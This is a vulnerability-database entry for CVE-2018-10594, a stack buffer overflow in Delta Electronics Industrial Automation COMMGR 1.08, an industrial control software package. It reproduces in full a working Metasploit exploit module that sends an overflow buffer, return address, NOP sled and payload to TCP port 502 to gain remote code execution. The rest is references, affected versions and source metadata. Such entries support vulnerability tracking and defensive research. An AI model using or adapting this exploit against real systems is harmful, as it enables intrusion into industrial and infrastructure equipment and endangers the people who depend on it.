ID
VAR-E-201807-0027
CVE
| cve_id: | CVE-2018-10594 | Trust: 3.1 |
EDB ID
45574
TITLE
Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit). CVE-2018-10594 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | delta | model: | electronics delta industrial automation commgr | scope: | eq | version: | 1.08 | Trust: 2.1 |
| vendor: | delta | model: | industrial automation commgr | scope: | eq | version: | 1.08 | Trust: 0.5 |
| vendor: | delta | model: | electronics delta industrial automation commgr stack | scope: | eq | version: | 1.08 | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Stack Buffer Overflow (Metasploit)
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.5 |
| tag: | overflow | Trust: 1.5 |
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | Remote | Trust: 1.0 |
| tag: | proof of concept | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2018-10594 | Trust: 3.1 |
| db: | ICS CERT | id: | ICSA-18-172-01 | Trust: 1.6 |
| db: | EXPLOIT-DB | id: | 45574 | Trust: 1.6 |
| db: | EDBNET | id: | 99652 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 148381 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 149741 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 149715 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-10594 | Trust: 3.1 |
| url: | https://raw.githubusercontent.com/rapid7/metasploit-framework/96681b03d123605f3963c519ccb3000efcfe3ed1/modules/exploits/windows/scada/delta_ia_commgr_bof.rb | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/45574/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 148381 |
| db: | PACKETSTORM | id: | 149741 |
| db: | PACKETSTORM | id: | 149715 |
| db: | EXPLOIT-DB | id: | 45574 |
| db: | EDBNET | id: | 99652 |
LAST UPDATE DATE
2022-07-27T09:21:21.304000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 148381 | date: | 2018-07-02T16:17:06 |
| db: | PACKETSTORM | id: | 149741 | date: | 2018-10-10T17:28:04 |
| db: | PACKETSTORM | id: | 149715 | date: | 2018-10-08T16:17:57 |
| db: | EXPLOIT-DB | id: | 45574 | date: | 2018-10-09T00:00:00 |
| db: | EDBNET | id: | 99652 | date: | 2018-10-09T00:00:00 |